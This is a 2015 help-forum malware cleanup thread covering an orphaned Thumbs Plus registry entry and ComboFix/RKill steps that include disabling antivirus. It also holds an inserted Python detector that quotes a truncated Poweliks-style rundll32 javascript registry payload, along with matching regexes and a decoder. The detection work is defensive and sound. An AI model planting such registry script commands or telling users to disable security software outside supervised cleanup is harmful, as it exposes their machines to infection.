~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 

 

 

 

 

 

 



#11 Oh My!


Posted 02 January 2015 - 07:01 PM

Very good. Please update me on how your computer is running now.
Gary
 

#12 baabel


Posted 03 January 2015 - 10:32 AM

My computer is working beautifully!  I will use it for a little while longer before running off to work.

 

I have some questions.

 

(1) I obviously want to do everything I can to prevent this from happening again.  It only takes one major computer crisis to show how much I depend on my primary computer.  Obviously Avast Free plus occasionally running SpyBot & Malwarebytes Free is not enough to protect myself.  What should I do next?  The Pay version of Avast?  Something else?

 

(2) I noticed in the cleaning logs we made that a program called "Thumbs Plus" cropped up more than once.  Thumbs Plus is an old photo managing program I used in the XP days and I believe even in the Windows 98 days.  I appear to still have a copy of it on my external drive.  It is in an uncompressed folder where I simply moved folders from my last primary XP computer to this external drive.  The external drive is now hooked up to my primary W7 computer.  I use the external for backups.  I don't even know if this ancient program would work in the W7 environment but among other files, the folder contains the Thumbs Plus exe.  Do you think Thumbs Plus may have enabled the attack?  Should I erase the folder it is in?

 

Any comments & suggestions that you have would be most welcome & appreciated.



#13 Oh My!


Posted 03 January 2015 - 10:51 AM

Thanks for the update. That is great to hear but we are not quite finished yet.

Here are the answers to your questions and then some additional steps to take.

The Pay version of Avast? Something else?

There is no way to absolutely insulate our computers from attacks or corruption. I have used Avast Free for a long time now and have found it to suit my purposes. For right now you can continue to use what you have and when we are finished I will provide some general protection information and in light of that you can evaluate whether or not you need to pay for additional protection. Computer security is sort of an umbrella issue that not only includes Antivirus protection but there are other components to consider as well.

----------

The reason why the Thumbs Plus entry was included in the fix is because there is a registry entry pointing to that program but the file it is pointing to doesn't exist. In other words it is an orphaned entry. It does no harm but it does no good either. I routinely delete these types of entries.

CustomCLSID: HKU\S-1-5-21-3319101212-3949270613-1064135436-1001_Classes\CLSID\{4F8A6B95-6220-40e1-BAF6-4F2810B32428}\InprocServer32 -> C:\Audiovisual & Graphics\Thumbs Plus 8 SP1\Bin\cswshlex64.dll No File

There is no need to worry about this program. You can leave things as is or if you find a compatible version it is safe to install.

----------

Please run this next.

===================================================

Run Combofix in Vista/7

--------------------

Combofix is a very powerful tool and special attention must be taken to allow it to work properly. Please pay careful attention to the following instructions.
  • Please download ComboFix from one of these locations:

BleepingComputer
ForoSpyware

  • Save Combofix.exe to your Desktop <-- Important!!!
  • Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools. (Click on this link to see a list of programs that should be disabled. The list is not all inclusive.)
  • Double click on Combofix.exe and follow the prompts. It is important you do not mouseclick while the program is running or it may stall.
Note #1: Often times it may appear as if ComboFix has stopped working. To verify it is still running please do one of the following below. If, based on the below, you have concluded ComboFix has stopped running please stop and advise me.
  • Check your computer clock. If it is still running then so is ComboFix
  • Open Task Manager and select the Applications Tab. If the status of AutoScan is Running, then ComboFix is running
  • Open Task Manager and select the Processes Tab. Under Image Name look for files ending in .3xe. If there are fluctuating numbers under CPU and Mem Usage then ComboFix is running
Note #2: If you receive the following error "Illegal operation attempted on a registry key that has been marked for deletion" please just restart your computer to resolve this issue

If Combofix fails to run properly using the above instructions please attempt the following:
  • Right click on the Combofix icon on your desktop and select Delete
  • Download a new copy but rename it to freshcopy.exe first, then save it to your desktop
  • Now download RKill.exe (or RKill renamed as iExplore.exe if the first one doesn't work properly) and save it to your desktop
  • Restart your computer in Safe Mode
  • Right click on RKill (or iExplore) and select Run as Administrator. If you are using Windows XP simply double click the icon
  • A black DOS screen should flash and disappear. If not, try to launch the program with the second file. If neither works please stop and let me know
  • When RKill is finished running you will be presented with a text file and a copy will be saved on your desktop. Copy and paste the contents of this report in your reply
  • Do not reboot your computer
  • Double click the freshcopy.exe icon (renamed Combofix file)
  • When finished, it will produce a log. Please copy and paste the C:\Combofix.txt log information in your next reply
  • If you disabled your antivirus please enable it again. If you uninstalled it please wait for instructions to reinstall it
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • Combofix log

Gary
 
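The difference post #13 draws between the orphaned Thumbs Plus entry and the localserver32 entry that FRST flagged can be checked mechanically over the log text. The following Python is an added example, not part of the original thread and not FRST's own code; the verdict names, the third sample line and the shift-by-one decoding of the visible eval() text are this example's own.

```python
import re

# Lines 1-2 are the CustomCLSID entries quoted in this thread's FRST log;
# line 3 is a constructed benign entry added for contrast.
SAMPLE = r'''CustomCLSID: HKU\S-1-5-21-3319101212-3949270613-1064135436-1001_Classes\CLSID\{4F8A6B95-6220-40e1-BAF6-4F2810B32428}\InprocServer32 -> C:\Audiovisual & Graphics\Thumbs Plus 8 SP1\Bin\cswshlex64.dll No File
CustomCLSID: HKU\S-1-5-21-3319101212-3949270613-1064135436-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-0-0-0-1000_Classes\CLSID\{00000000-0000-0000-0000-000000000001}\InprocServer32 -> C:\Program Files\Example\shellext.dll (Example Vendor)'''

LINE_RE = re.compile(r"^CustomCLSID:\s+(?P<key>.+?)\s+->\s+(?P<data>.*)$")
CLSID_RE = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")
# A COM server value should name a DLL or EXE; a rundll32 "javascript:" command
# line that calls mshtml's RunHTMLApplication is script stored in the registry.
SCRIPT_RE = re.compile(r"rundll32(?:\.exe)?\s+javascript:|RunHTMLApplication", re.I)
EVAL_RE = re.compile(r'eval\("(\S+)')


def shift_down(text):
    """Undo a +1 character shift, which is what the visible eval() text uses."""
    return "".join(chr(ord(c) - 1) for c in text)


def triage(line):
    """Classify one FRST CustomCLSID line; returns None for any other line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    key, data = m.group("key"), m.group("data")
    clsid = CLSID_RE.search(key)
    result = {"clsid": clsid.group(0) if clsid else None,
              "server": key.rsplit("\\", 1)[-1], "decoded": None}
    if SCRIPT_RE.search(data):
        result["verdict"] = "script-command"   # the entry FRST marked "Poweliks?"
        frag = EVAL_RE.search(data)
        if frag:
            result["decoded"] = shift_down(frag.group(1))
    elif data.rstrip().endswith("No File"):
        result["verdict"] = "orphaned"         # target file missing, leftover entry
    else:
        result["verdict"] = "file-present"
    return result


if __name__ == "__main__":
    for entry in filter(None, map(triage, SAMPLE.splitlines())):
        print(entry)
```

Only the part of the value that FRST printed is decoded; the remaining characters of the data entry are not in the log.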

#14 baabel


Posted 03 January 2015 - 02:22 PM

Thanks for the explanation regarding the orphaned registry entry.

 

Next: when I attempted to download ComboFix from either of the two locations I received the message:  "Your current security settings do not allow this file to be downloaded".

 

I had not yet disabled Avast Free because the instruction to do so comes after the instruction to download Combofix.



#15 Oh My!


Posted 03 January 2015 - 02:35 PM

If you are using Internet Explorer try Firefox instead. If that is not the issue disable Avast then try the download.
Gary
 



